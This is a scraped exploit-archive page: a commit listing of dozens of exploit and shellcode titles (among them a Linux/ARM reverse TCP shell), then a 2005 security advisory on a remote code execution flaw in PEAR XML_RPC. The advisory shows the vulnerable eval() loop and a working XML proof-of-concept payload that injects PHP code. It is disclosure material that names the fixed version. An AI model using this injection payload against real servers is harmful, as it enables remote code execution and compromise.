bfebc3fa5a
62 changes to exploits/shellcodes macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability' Peercast < 0.1211 - Format String Trillian Pro < 2.01 - Design Error dbPowerAmp < 2.0/10.0 - Buffer Overflow PsychoStats < 2.2.4 Beta - Cross Site Scripting MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution GitStack 2.3.10 - Unauthenticated Remote Code Execution Invision Power Top Site List < 2.0 Alpha 3 - SQL Injection (PoC) Invision Power Board (IP.Board) < 2.0 Alpha 3 - SQL Injection (PoC) Aardvark Topsites < 4.1.0 - Multiple Vulnerabilities DUWare Multiple Products - Multiple Vulnerabilities AutoRank PHP < 2.0.4 - SQL Injection (PoC) ASPapp Multiple Products - Multiple Vulnerabilities osCommerce < 2.2-MS2 - Multiple Vulnerabilities PostNuke < 0.726 Phoenix - Multiple Vulnerabilities MetaDot < 5.6.5.4b5 - Multiple Vulnerabilities phpGedView < 2.65 beta 5 - Multiple Vulnerabilities phpShop < 0.6.1-b - Multiple Vulnerabilities Invision Power Board (IP.Board) < 1.3 - SQL Injection phpBB < 2.0.6d - Cross Site Scripting Phorum < 5.0.3 Beta - Cross Site Scripting vBulletin < 3.0.0 RC4 - Cross Site Scripting Mambo < 4.5 - Multiple Vulnerabilities phpBB < 2.0.7a - Multiple Vulnerabilities Invision Power Top Site List < 1.1 RC 2 - SQL Injection Invision Gallery < 1.0.1 - SQL Injection PhotoPost < 4.6 - Multiple Vulnerabilities TikiWiki < 1.8.1 - Multiple Vulnerabilities phpBugTracker < 0.9.1 - Multiple Vulnerabilities OpenBB < 1.0.6 - Multiple Vulnerabilities PHPX < 3.26 - Multiple Vulnerabilities Invision Power Board (IP.Board) < 1.3.1 - Design Error HelpCenter Live! < 1.2.7 - Multiple Vulnerabilities LiveWorld Multiple Products - Cross Site Scripting WHM.AutoPilot < 2.4.6.5 - Multiple Vulnerabilities PHP-Calendar < 0.10.1 - Arbitrary File Inclusion PhotoPost Classifieds < 2.01 - Multiple Vulnerabilities ReviewPost < 2.84 - Multiple Vulnerabilities PhotoPost < 4.85 - Multiple Vulnerabilities AZBB < 1.0.07d - Multiple Vulnerabilities Invision Power Board (IP.Board) < 2.0.3 - Multiple Vulnerabilities Burning Board < 2.3.1 - SQL Injection XOOPS < 2.0.11 - Multiple Vulnerabilities PEAR XML_RPC < 1.3.0 - Remote Code Execution PHPXMLRPC < 1.1 - Remote Code Execution SquirrelMail < 1.4.5-RC1 - Arbitrary Variable Overwrite XPCOM - Race Condition ADOdb < 4.71 - Cross Site Scripting Geeklog < 1.4.0 - Multiple Vulnerabilities PEAR LiveUser < 0.16.8 - Arbitrary File Access Mambo < 4.5.3h - Multiple Vulnerabilities phpRPC < 0.7 - Remote Code Execution Gallery 2 < 2.0.2 - Multiple Vulnerabilities PHPLib < 7.4 - SQL Injection SquirrelMail < 1.4.7 - Arbitrary Variable Overwrite CubeCart < 3.0.12 - Multiple Vulnerabilities Claroline < 1.7.7 - Arbitrary File Inclusion X-Cart < 4.1.3 - Arbitrary Variable Overwrite Mambo < 4.5.4 - SQL Injection Synology Photostation < 6.7.2-3429 - Multiple Vulnerabilities D-Link DNS-343 ShareCenter < 1.05 - Command Injection D-Link DNS-325 ShareCenter < 1.05B03 - Multiple Vulnerabilities Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)
67 lines
No EOL
3 KiB
Text
67 lines
No EOL
3 KiB
Text
PEAR XML_RPC Remote Code Execution
|
|
|
|
Vendor: The PEAR Group
|
|
Product: PEAR XML_RPC
|
|
Version: <= 1.3.0
|
|
Website: http://pear.php.net/package/XML_RPC/
|
|
|
|
CVE: 17793
|
|
PACKETSTORM: 38393
|
|
|
|
Description:
|
|
PEAR XML_RPC is a PHP implementation of the XML-RPC web RPC protocol, and used by many different developers across the world. PEAR XML_RPC was originally developed by Edd Dumbill of Useful Information Company, but has since been expanded by several individuals. Unfortunately PEAR XML_RPC is vulnerable to a remote php code execution vulnerability that may allow for an attacker to compromise a vulnerable server. Version 1.3.1 has been released to address these issues.
|
|
|
|
|
|
Remote Command Execution:
|
|
PEAR XML_RPC is vulnerable to a very high risk php code injection vulnerability due to unsanatized data being passed into an eval() call. Let us have a look at the code that allows the vulnerability to present itself.
|
|
|
|
// decompose incoming XML into request structure
|
|
xml_parser_set_option($parser_resource, XML_OPTION_CASE_FOLDING, true);
|
|
xml_set_element_handler($parser_resource, 'XML_RPC_se', 'XML_RPC_ee');
|
|
xml_set_character_data_handler($parser_resource, 'XML_RPC_cd');
|
|
if (!xml_parse($parser_resource, $data, 1)) {
|
|
// return XML error as a faultCode
|
|
$r = new XML_RPC_Response(0,
|
|
$XML_RPC_errxml+xml_get_error_code($parser_resource),
|
|
sprintf('XML error: %s at line %d',
|
|
xml_error_string(xml_get_error_code($parser_resource)),
|
|
xml_get_current_line_number($parser_resource)));
|
|
xml_parser_free($parser_resource);
|
|
} else {
|
|
xml_parser_free($parser_resource);
|
|
$m = new XML_RPC_Message($XML_RPC_xh[$parser]['method']);
|
|
// now add parameters in
|
|
for ($i = 0; $i < sizeof($XML_RPC_xh[$parser]['params']); $i++) {
|
|
// print '\n";
|
|
$plist .= "$i - " . $XML_RPC_xh[$parser]['params'][$i] . " \n";
|
|
eval('$m->addParam(' . $XML_RPC_xh[$parser]['params'][$i] . ');');
|
|
}
|
|
XML_RPC_Server_debugmsg($plist);
|
|
|
|
|
|
The for() loop that holds the vulnerable eval() call is used to build the request from an incoming POST containing an XML document. There is really no type of checks or sanitation done prior to this point, and the fact that magic_quotes_gpc does not apply makes it that much easier for this issue to be exploited.
|
|
|
|
<?xml version="1.0"?>
|
|
<methodCall>
|
|
<methodName>test.method</methodName>
|
|
<params>
|
|
<param>
|
|
<value><name>','')); phpinfo(); exit;/*</name></value>
|
|
</param>
|
|
</params>
|
|
</methodCall>
|
|
|
|
|
|
The above xml file when posted to the vulnerable server will cause the phpinfo() function call to be executed on the vulnerable server.
|
|
|
|
|
|
Solution:
|
|
PEAR XML_RPC 1.3.1 has been released to address this issue and can be found at
|
|
|
|
http://pear.php.net/package/XML_RPC/download/1.3.1
|
|
|
|
Both users and developers alike are strongly advised to upgrade immediately!
|
|
|
|
|
|
Credits:
|
|
James Bercegay of the GulfTech Security Research Team |